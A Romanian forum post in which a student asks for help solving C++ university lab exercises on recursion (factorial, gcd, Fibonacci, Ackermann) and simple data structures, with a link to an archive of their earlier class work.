  18. Buna ziua, am 2 probleme de rezolvat. Una pe baza de recursivitate si alta pentru structuri de date pentru facultate si nu reusesc. Daca m-ati putea ajuta sau daca mi-ati putea oferi sfaturi pentru rezolvarea acestora as fi recunoscator. RECURSIVITATE: 1. Scrieti un algoritm recursiv care afiseaza un cuvant dat in ordine inversa. 2. Scrieti o functie recursiva pentru calculul lui n!. 3. Calculati recursiv cmmdc(a,b). 4. Determinati al n-lea termen din sirul lui Fibinacci. 5. Calculul functiei recursive Aackerman definita prin relatiile: Ack(m,n)= n+1 , daca m=0 Ack(m-1,1) ,daca m>0 si n=0 Ack(m-1, ack(m,n-1)) daca n>0, m>0 STRUCTURI DE DATE: 1. Se da structura Data calendaristica. Functie care compara doua date calendaristice. 2. Se dau numele, nota, nrdiscipline cu media 10. Daca se dau n studenti, sa se determine primii k studenti in ordine descrescatoare dupa note, in caza de egalitate, descrescatoare dupa numarul notelor de 10. 3. Scrieti intr-un fisier toate articolele introduse de la tastatura, cu structura den, pret, cant, unit_mas, prettotal=pret*cant , TVA=prettotal*1.19. Sunt pentru recuperarea la facultate a 2 laboratoare. Sigur dumneavoastra stiti mai bine C++ si timpul este limita sa ma documentez sa invat acuma deoarece trebue sa recuprez laboratoarele sa pot intra in sesiune.. Am incercat si am facut problemele discutate si oferite la clasa pe aceste teme si am sa le las mai jos.. Va multumesc mult! https://www.mediafire.com/file/fhj7do22kxgd3x3/Fundamentele+programarii.rar
    -1 points
×
×
  • Create New...